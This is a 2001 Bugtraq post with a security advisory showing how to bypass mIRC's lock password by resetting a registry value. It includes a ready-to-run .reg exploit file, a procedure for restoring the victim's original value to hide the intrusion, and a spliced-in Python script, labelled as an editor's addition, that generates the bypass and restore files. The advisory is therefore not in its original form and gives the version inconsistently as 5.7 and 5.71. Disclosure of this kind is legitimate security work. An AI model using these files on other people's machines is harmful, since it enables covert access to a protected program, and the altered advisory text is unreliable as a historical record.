[18832] in bugtraq
mIRC allows password protection to be bypassed
daemon@ATHENA.MIT.EDU (scalar)
Fri Jan 26 13:26:46 2001
X-Apparently-From: JulieRogles@aol.com
Message-ID: <001201c08727$91904780$fdd40f04@pavilion>
Date: Thu, 25 Jan 2001 17:35:56 -0600
Reply-To: scalar <scalar@SHADOWVX.COM>
From: scalar <scalar@SHADOWVX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,

I have found a hole in mIRC (a popular IRC client for the Windows platform) that allows a malicious user to subvert the optional password on the mIRC.exe binary. Full details are in the attached advisory. The advisory is also available at http://chronix.shadowvx.com/advisories/scalar-01-02.txt

thanks,
scalar
[Attachment: scalar-01-02.txt]
Scalar Security Research Labs
===================================
Presents
--------------------------[ Advisory 01-02 ]--------------------------
Advisory ID : 01-02
Synopsis : mIRC password protection can be bypassed
Application : mIRC version 5.7; other versions may be affected
Vendor : Not yet notified
Web Contact : www.mirc.com
Exploit : Execution of mIRC without knowledge of the password
Author : scalar
E-mail : scalar@shadowvx.com
Homepage : chronix.shadowvx.com
---| Table of Contents
---| The Problem
---| Exploit Details
---| Patches/Workarounds
---| Disclaimer
---| Feedback
---| The Problem:
IRC is a protocol for real-time text communication across the Internet. It is a widely used channel; connecting to an IRC server requires software known as an IRC client, and on the Windows operating system one of the most widely used clients is mIRC. This client is not totally secure: it has a somewhat significant vulnerability that allows a malicious user who can write to the registry hive of the account that runs mIRC (in practice, anyone logged in to that Windows account) to bypass the mIRC lock password. Specifically, version 5.71 is analysed within this advisory.
In mIRC, there is an option to "Lock" mIRC. It requires a password to be entered before the program fully starts and becomes functional. The option is located within the Options dialog window: in the left-hand panel, [+] General should be visible. Click the [+] to expand the list of options in the General subset, and the following should be visible:
[-]-General
|-Server
|-Lock
Next, choose the "Lock" option. This changes the right-hand side of the window, making the Lock options available. In the upper right-hand corner is the button: Lock. Clicking this button opens a dialog box that requests a new password with which to lock mIRC. After entering the password, click "OK". This sets the password and effectively locks the mIRC binary: each subsequent execution of the program will require the password.

This option seems to secure the IRC client effectively; however, I have found a way to easily subvert the password, and thus gain full control of mIRC without ever entering it.
The password mIRC uses to "lock" mIRC is kept within the registry. To be exact, it is the default value of the following key:

HKEY_CURRENT_USER\Software\mIRC\LockOptions

If no password is set, the value will be: 0,1. However, if a password is set, which is presumably the case, the value will look similar to the following: 3351915520,1. This particular value is for the password: abcdefg. As of yet, I do not know the algorithm used to encrypt the password. An interesting detail about the value contained within the key is that no matter the length of the password, it is always stored as ten numeric characters, followed by ",1". The value may not actually be the encrypted password; that is simply my assumption. Note that 3351915520 is below 4294967295, the largest unsigned 32-bit integer, which is itself ten digits long: the stored number is consistent with a 32-bit hash or checksum of the password (from which a seven-character password cannot be recovered), and since the unlocked value is the single digit 0 the field is not padded, so shorter numbers should be expected for other passwords. The algorithm does not matter for the bypass, which never needs to recover the password.

As stated previously, when mIRC is set with no password, the value contained within the key is: 0,1. Thus, if a password is set and the value is changed to 0,1, mIRC will consequently execute without requiring a password.
---| Exploit Details:
This vulnerability is easily exploited with the following registry file, which should be saved with the extension .reg (e.g., mIRC_sploit.reg). Once the file has been created, double-click its icon within Windows Explorer and agree to all subsequent prompts. In REGEDIT4 syntax, "@=" sets the key's default value, which regedit displays as "(Default)"; a line reading "(Default)"="0,1" would instead create a separate value literally named (Default) and leave the real default value untouched.
---BEGIN CUT HERE------------------------------------------------------
REGEDIT4

[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
; "@" is the key's default value, shown as "(Default)" in regedit
@="0,1"
---END CUT HERE--------------------------------------------------------
However, a more clever attacker will preserve the victim's password rather than destroy it:
1. Export the original key to a backup file, e.g. regedit /e lock_backup.reg "HKEY_CURRENT_USER\Software\mIRC\LockOptions", so that the existing default value (the password token) is saved.
2. Import mIRC_sploit.reg to set the default value to 0,1.
3. Use mIRC without entering a password.
4. Finish using mIRC.
5. Import lock_backup.reg to put the original value back.
This method keeps the password, whilst still allowing a malicious user access to the program. (A key's default value cannot be renamed in regedit, so the export/import round trip is how a copy of it is kept.)
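The following is an added example for the registry storage described in "The Problem" and for the preserve-and-restore procedure above; it is the editor's code, not part of the original advisory or of mIRC. It works on REGEDIT4 text (what `regedit /e` exports and `regedit /s` imports) rather than on the live registry, so it runs offline on any platform. The key path and the "0,1" / "<number>,1" value format come from the advisory; the sample export, the file names and the reading of the number as an unsigned 32-bit hash are assumptions.

```python
# Added example, not part of the original advisory: audit and patch the
# LockOptions key through REGEDIT4 text (what "regedit /e" exports and
# "regedit /s" imports) instead of the live registry, so it runs offline on
# any platform. The key path and the "0,1" / "<number>,1" value format are
# taken from the advisory; the sample export, file names and the uint32
# interpretation of the number are the editor's assumptions.
import re

LOCK_KEY = r"HKEY_CURRENT_USER\Software\mIRC\LockOptions"
UNLOCKED = "0,1"  # default value the advisory reports when no password is set

# Constructed sample of a "regedit /e" export of a locked mIRC (token for
# the password "abcdefg" as given in the advisory).
SAMPLE_EXPORT = "REGEDIT4\n\n[" + LOCK_KEY + "]\n@=\"3351915520,1\"\n\n"


def _unescape(s):
    # REG_SZ data escapes backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def _escape(s):
    return s.replace("\\", "\\\\").replace('"', '\\"')


def parse_reg(text):
    """Parse REGEDIT4 (or 'Windows Registry Editor Version 5.00') text into
    {key_path: {value_name: data}}. The key's default value is stored under
    the name "@". Only REG_SZ ("...") data is decoded, which is all this key
    uses; other types are kept as their raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";") or line == "REGEDIT4"
                or line.startswith("Windows Registry Editor")):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = re.fullmatch(r'(?:@|"((?:[^"\\]|\\.)*)")=(.*)', line)
        if m and current is not None:
            name = "@" if m.group(1) is None else _unescape(m.group(1))
            data = m.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = _unescape(data[1:-1])
            current[name] = data
    return keys


def lock_state(data):
    """Classify a LockOptions default value as ("unlocked"|"locked"|"unknown",
    number). Assumption (editor's, not the advisory's): the number is an
    unsigned 32-bit hash/checksum. 4294967295 is the largest such value and
    is ten digits long, which matches the ten-digit values the advisory saw;
    anything larger is treated as not this format."""
    m = re.fullmatch(r"(\d{1,10}),1", data)
    if not m:
        return ("unknown", None)
    number = int(m.group(1))
    if number >= 2 ** 32:
        return ("unknown", number)
    return ("unlocked" if number == 0 else "locked", number)


def audit(export_text):
    """Report the lock state recorded in an exported .reg file."""
    values = parse_reg(export_text).get(LOCK_KEY)
    if values is None or "@" not in values:
        return ("absent", None)
    return lock_state(values["@"])


def _reg_file(default_value):
    return 'REGEDIT4\n\n[%s]\n@="%s"\n\n' % (LOCK_KEY, _escape(default_value))


def bypass_reg():
    """The advisory's exploit in correct REGEDIT4 syntax: "@=" addresses the
    key's default value (shown as "(Default)" in regedit)."""
    return _reg_file(UNLOCKED)


def restore_reg(export_text):
    """Companion file that puts the original token back after the bypass, so
    the victim's password survives; replaces the rename steps in the
    advisory, which regedit does not allow for a key's default value."""
    return _reg_file(parse_reg(export_text)[LOCK_KEY]["@"])


if __name__ == "__main__":
    print("sample export:", audit(SAMPLE_EXPORT))
    print(bypass_reg())
    print(restore_reg(SAMPLE_EXPORT))
```

On the Windows side, `regedit /e lock_backup.reg "HKEY_CURRENT_USER\Software\mIRC\LockOptions"` produces the input for `audit()` and `restore_reg()`, and `regedit /s` imports the files that `bypass_reg()` and `restore_reg()` return. Windows 2000 and later write exports with the "Windows Registry Editor Version 5.00" header in UTF-16, so read such a file with `encoding="utf-16"` before passing its text in; the REGEDIT4 files this code writes are plain ASCII, which every regedit version still accepts.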
---| Patches/Workarounds:
No patches or workarounds are known at this time. The lock is a client-side check against a value in the user's own registry hive, so it cannot protect against anyone who is already logged in as that user; separate Windows accounts for separate people, and locking the workstation when it is unattended, are the only real protection.
---| Disclaimer:
The information contained in this advisory is the copyright of
Scalar Security Research Labs. The data is believed to be accurate
at the time of release, but no representation or warranty is given,
express or implied, as to its accuracy or completeness. Neither
the author nor the publisher accepts any liability whatsoever for
any direct, indirect or consequential loss or damage arising in any
way from any use of, or reliance placed on, this information for
any purpose. This advisory may be redistributed provided that no
fee is assigned and that the content is not modified in any way.
---| Feedback:
Please send suggestions, updates, and comments to:
Scalar Security Research Labs
E-mail : scalar@shadowvx.com
Homepage : chronix.shadowvx.com
______________________________________________________________________
Copyright 2001.
Scalar Security Research Labs.
All rights reserved.